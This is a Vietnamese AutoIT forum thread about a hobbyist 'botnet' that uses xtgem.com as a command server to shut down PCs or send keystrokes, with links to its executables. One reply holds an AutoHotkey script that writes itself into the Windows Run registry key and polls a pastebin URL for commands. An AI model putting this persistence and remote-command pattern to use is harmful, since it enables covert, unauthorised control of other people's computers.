1. Tải bản cài đặt AutoIT mới nhất

    Chào Khách. Nếu bạn mới tham gia và chưa cài đặt AutoIT.
    Vui lòng vào topic trên để tải bản AutoIT mới nhất nhé
    Dismiss Notice
  2. Quy định và nội quy

    Chào Khách. Vui lòng đọc kỹ nội quy và quy định của diễn đàn
    Để tránh bị ban một cách đáng tiếc nhé!
    Dismiss Notice
  3. Hướng dẫn chèn mã AutoIT trong diễn đàn

    Chào Khách. Vui lòng xem qua bài viết này
    Để biết cách chèn mã AutoIT trong diễn đàn bạn nhé :)
    Dismiss Notice

Software Điều khiển máy tính từ xa (hay còn gọi là botnet_mục đích xấu)

Thảo luận trong 'Giới thiệu sản phẩm' bắt đầu bởi Quản lượng, 9/8/17.

Tags:
  1. Quản lượng

    Quản lượng qlf
    • 18/23

    Tham gia ngày:
    27/4/17
    Bài viết:
    74
    Đã được thích:
    39
    Hiện tại trang web xtgem đã chỉnh sửa nên code của mình không còn sử dụng được nữa. Bài viết này chỉ mang tính chất tham khảo
    [update]: Quên upload file exe của file sender và file receive
    sender: https://drive.google.com/open?id=0B0p4sUwMj8rcYmtyb2tjUDgwRzA
    receive: https://drive.google.com/open?id=0B0p4sUwMj8rcZHJLVVFLRzYxTkE

    Hôm qua mình đã đăng hướng dẫn post dữ liệu lên web xtgem.com. Và đây là sản phẩm của mình, trình điều khiển máy tính từ xa, lấy server là xtgem.com. Không còn thời gian nhiều, mình sắp vô năm học nên mình chỉ thiết kế 2 lệnh cho con botnet này:
    #shutdown : Tắt máy tính
    #SendKey param1 param2:
    param1 là phím cần gửi, có thể gửi các phím tắt như Alt+F4 ... Mình truyền param1 cho lệnh Send của autoit luôn. Tham khảo: https://www.autoitscript.com/autoit3/docs/appendix/SendKeys.htm
    param2 là số lần gửi

    Ví dụ:
    #SendKey aaa -> aaa
    #SendKey aaa 2 -> aaaaaa
    #SendKey !{F4} -> tắt window đang active

    Đầu tiên là phải khởi tạo:
    Chạy 2 file init_sender.exe, init_response.exe để setup ....Thực ra là trong file zip có khởi tạo sẵn bằng tài khoản mình public.
    Đăng kí: http://xtgem.com/register
    [​IMG] [​IMG]
    khởi tạo response:
    [​IMG]
    ví dụ bạn tạo tài khoản với tên website là :
    Mã (Text):
    domain.xtgem.com
    thì "domain" chính là cái cần nhập vào
    Khởi tạo sender:
    [​IMG]
    Nhập tài khoản và mật khẩu xtgem của bạn vào

    ==> Xong phần khởi tạo. Nếu bạn không thích tạo tk thì cũng không sao, mình sợ nhiều người test quá. Bạn A mới send lệnh a xong, bạn B lại send liền lệnh b. Thế là bạn A không sử dụng được ...
    Cách sử dụng:
    -file sender.exe là file điều khiển
    -file recieve_response.exe là file nhận lệnh và thực hiện
    Lưu ý:
    -2 file này có thể để ở 2 máy tính khác nhau(điều khiển máy tính từ xa).
    -File receive phải được bật, còn file sender thích thì bật, không thì thôi.
    -Khi mới vừa mở file receive lên thì nó sẽ nhận lệnh đã gửi trước đó, nếu không muốn bị tắt máy oan thì phải nhớ gửi chuỗi rỗng trước khi bật file receive.
    -Mỗi lần gửi lệnh lên server thì file receive chỉ thực hiện 1 lần duy nhất.
    [​IMG]
    Nhập lệnh như hướng dẫn ở đầu bài và các bạn xem thành quả. Mình đã test, sender = laptop và receive = máy tính bàn và kết quả là máy tính bàn tắt lên, tắt xuống chục lần trong quá trình test =) =) =) Nếu có lỗi gì thì các bạn có thể cmt lại để mình update
    Các bạn yên tâm, bài viết chỉ mang tính chất tham khảo nên file receive không bị cài vào registry và vẫn còn tray icon để có thể tắt.
     
    Chỉnh sửa cuối: 6/10/17
    kakanet and aventador like this.
  2. aventador

    aventador Thành viên mới
    • 3/6

    Tham gia ngày:
    31/7/17
    Bài viết:
    12
    Đã được thích:
    2
    có thể share code không bạn ơi, mình đang rất hứng thú với vấn đề này
     
  3. Milli Master

    Milli Master ??
    • 93/113

    Tham gia ngày:
    9/7/16
    Bài viết:
    106
    Đã được thích:
    2,302
    Nơi ở:
    Thủ Đức, TP Hồ Chí Minh
    k biết có bị antivirus nhai đầu k nhỉ
     
  4. Quản lượng

    Quản lượng qlf
    • 18/23

    Tham gia ngày:
    27/4/17
    Bài viết:
    74
    Đã được thích:
    39
    Cái này dùng 1 server trung gian gửi dữ liệu giữa 2 máy, mình ko có tiền mua server nên mượn tạm của xtgem :)))) Đây là botnet, mình không share code được, mình có bài viết hướng dẫn cách "mượn" server xtgem.com, bạn có thể tham khảo (cách gửi dữ liệu lên server, còn cách lấy dữ liệu thì tự tìm hiểu).Link: https://autoitvn.com/threads/goi-y-request-xtgem-com-co-so-cho-botnet.1022/
     
    aventador and kakanet like this.
  5. Quản lượng

    Quản lượng qlf
    • 18/23

    Tham gia ngày:
    27/4/17
    Bài viết:
    74
    Đã được thích:
    39
    Hầu hết antivirus thấy chương trình viết = autoit là "nhai đầu" hết :v :v :v Cơ mà để cài được file receiver vào máy người khác rồi cho nó chạy cũng là 1 câu chuyện rất là khó khăn...
     
  6. Milli Master

    Milli Master ??
    • 93/113

    Tham gia ngày:
    9/7/16
    Bài viết:
    106
    Đã được thích:
    2,302
    Nơi ở:
    Thủ Đức, TP Hồ Chí Minh
    Cái này có ý tưởng là làm dc à, code đây nó rất đơn giản k cần request gì luôn:
    Mã (Text):

    #Persistent
    RegWrite,REG_SZ,HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,BotNet,%A_ScriptFullPath% ; Dòng này chạy sẽ ghi vào trong file Reg, File sẽ tự khởi động khi mở máy
    SetTimer,Bot_Net,20000 ;20 giây kiểm tra host 1 lần
    Bot_Net:
    IfnotExist,%A_desktop%\Number.txt
    FileAppend,ddd,%A_desktop%\Number.txt
    FileRead,Number,%A_desktop%\Number.txt
    URLDownloadToFile,https://pastebin.com/raw/G4qBWfb9,%A_Desktop%\Info.txt
    FileRead,Info,%A_Desktop%\Info.txt
    StringSplit,Command,Info,|
    if (Command1<>Number){
    if (Command2=="Shutdown")
      MsgBox,262192,Simple Bot Net,Tắt máy nha
    FileDelete,%A_desktop%\Number.txt
    FileAppend,%Command1%,%A_desktop%\Number.txt
    }
    }
     
    Chỉnh sửa cuối: 11/8/17
    lutuhu and aventador like this.
  7. Quản lượng

    Quản lượng qlf
    • 18/23

    Tham gia ngày:
    27/4/17
    Bài viết:
    74
    Đã được thích:
    39
    Nói như bạn đơn giản quá :))) Mình code gần 200 dòng cho 2 file đó bạn:)))

    Code này mình không share vì sợ mấy thanh niên không nghiêm túc sửa code của mình lại xong đi cài keyloger ở các tiệm nét, ghê hơn là ddos các máy chủ :)))) Không tốt :)))
     
  8. Milli Master

    Milli Master ??
    • 93/113

    Tham gia ngày:
    9/7/16
    Bài viết:
    106
    Đã được thích:
    2,302
    Nơi ở:
    Thủ Đức, TP Hồ Chí Minh
    Cai nay minh lam cho vui thoi sao ma bang cua ban dc ;), cai nay chi la vi du cho @aventador hieu ve nguyen ly chay cua con botnet cua ban thoi :D:D
     
    Quản lượng thích bài này.
  9. DuyMinh

    DuyMinh Thành viên năng động
    • 28/34

    Tham gia ngày:
    14/3/17
    Bài viết:
    177
    Đã được thích:
    92
    MiliMeter code cũng chính xác mà... Nguyên lý cũng đơn giản thôi...
     
    Quản lượng and Milli Master like this.
  10. Milli Master

    Milli Master ??
    • 93/113

    Tham gia ngày:
    9/7/16
    Bài viết:
    106
    Đã được thích:
    2,302
    Nơi ở:
    Thủ Đức, TP Hồ Chí Minh
    (y) Code em viet cung lam vd cho code update do anh :)
     
    Chỉnh sửa cuối: 10/8/17
    aventador and Quản lượng like this.
  11. aventador

    aventador Thành viên mới
    • 3/6

    Tham gia ngày:
    31/7/17
    Bài viết:
    12
    Đã được thích:
    2
    à há. vậy là nguyên lý của cái bot net này sẽ là
    - ở máy request sẽ là sửa file trên host.
    - ở máy receive sẽ là đọc file trên host.
    thank mình đã hiểu.
    Cơ mà ở file receive của @Quản lượng sẽ là định nghĩa các hàm sẽ chạy ở máy receive à
     
    Quản lượng thích bài này.
  12. Quản lượng

    Quản lượng qlf
    • 18/23

    Tham gia ngày:
    27/4/17
    Bài viết:
    74
    Đã được thích:
    39
    Đúng rồi đó bạn! File receive sẽ compile các lệnh lấy được trên host. Ví dụ
    Lệnh là #shutdown thì cho file Receive chạy lệnh Shutdown(1)
    Lệnh là #send $param1 $param2 thì cho file Receive chạy lệnh for i=1 to $param2 Step 1 Send($param1)
    À đúng rồi, để lấy được $param1 và $param2 thì phải biết một chút về StringRegEx
     
    aventador thích bài này.
  13. aventador

    aventador Thành viên mới
    • 3/6

    Tham gia ngày:
    31/7/17
    Bài viết:
    12
    Đã được thích:
    2
    cảm ơn bạn đã thông não, mình đã hiểu nguyên lý hoạt động
     

Chia sẻ trang này

Đang tải...